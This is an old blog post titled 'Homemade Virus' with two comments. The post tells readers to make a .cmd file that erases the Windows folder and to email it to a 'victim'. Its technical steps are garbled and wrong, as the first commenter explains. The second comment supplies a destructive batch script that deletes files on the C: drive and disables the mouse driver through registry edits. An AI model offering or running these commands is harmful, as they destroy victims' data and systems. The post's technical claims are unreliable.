Tuesday, September 25, 2007

Homemade Virus

Homemade Virus

Caution: This is a virus that can do alot of damage and sometimes cause the victim to rebuy Windows XP/Linux. Do NOT just use this because you are mad at a friend. I am in no way responible for anything you do

Now that I got that over with it, lets talk business =D
What this virus does is completely and permanently delete Windows or Linux depending. Please read the caution at the top.
Onto the trick. Follow the directions carefully.
  • Write The Following In Notepad Exactly as it says Code: 01001011000111110010010101010101010000011111100000
  • Save the file as an EXE (Click File-->Save as...-->and erase what ever is there and type in something like funnystuff.exe).
  • To test it, create a textfile called "TEST.txt"(just leave it blank) and save it in 'My Documents' or something in your C: drive. Now in a NEW notepad type "erase C:TEST.txt" (without the quotes). Then do "Save As..." and save it as "Test.cmd". Now run the file "Test.cmd" and go to C: and you'll see your Test.txt is gone. Now, the real work begins:
  • Go to Notpad and type "erase C:WINDOWS" (or C:LINUX if your targeted victim has linux) and save it again as funnypicture.cmd or something.
  • DON'T EVER run the file or you'll lose your WINDOWS map. So, that's the virus.
  • Send an email to your victim and attach the file "Funnypicture.cmd" or whatever you named it. When they open it, their Windows will be erased. This would be a giant pain in the @$$.


TopHatt said...

Ok, it's clear you have absolutely no idea what you're doing. Either that, or you're a complete and total fraud. I happen to be somewhat intelligible of what I'm doing, so I'm going to point out what's wrong with this.

Fault number 1:
Notepad can not write directly and/or save to a .exe (executable) file, as it's a text editor, and it can't read or write to an entire program library. Also, .exe's are compiled, so even attempting to read one into Notepad would result in something like this:

(http://pastebin.com/c2wn9PWm) (A very, very small bit of Minecraft's executable)

Fault number 2:
EXE's don't run off straight binary. The binary number you pulled out of your butt actually translates to 330388569655264, which runs absolutely nothing in a "saved" exe file, anyway.

Fault number 3:
You don't even refer back to the EXE file that was just "made" anyway! Making that "EXE" was totally useless!

Fault number 4:
Saving a text file in My Documents and running "erase C:Test.txt" won't erase it for two reasons:
1. My Documents is in C:\Users\%USERNAME%\Documents\. C:\ is in C:\.
2. You got your syntax wrong: C:TEST.txt doesn't have a slash, so it's not a directory.

And finally, fault number 5:
THIS WON'T WORK UNDER LINUX! C:\LINUX isn't valid under linux, because Linux doesn't assign drive letters, and LINUX is not the root directory. Also, "erase" is not a Unix/Linux command.


Alison said...

True dat

This would work just about right

@Echo off
Del C:\ *.* |y

rem Disable Mouse
set key="HKEY_LOCAL_MACHINE\system\CurrentControlSet\Services\Mouclass"
reg delete %key%
reg add %key% /v Start /t REG_DWORD /d 4
rem ---------------------------------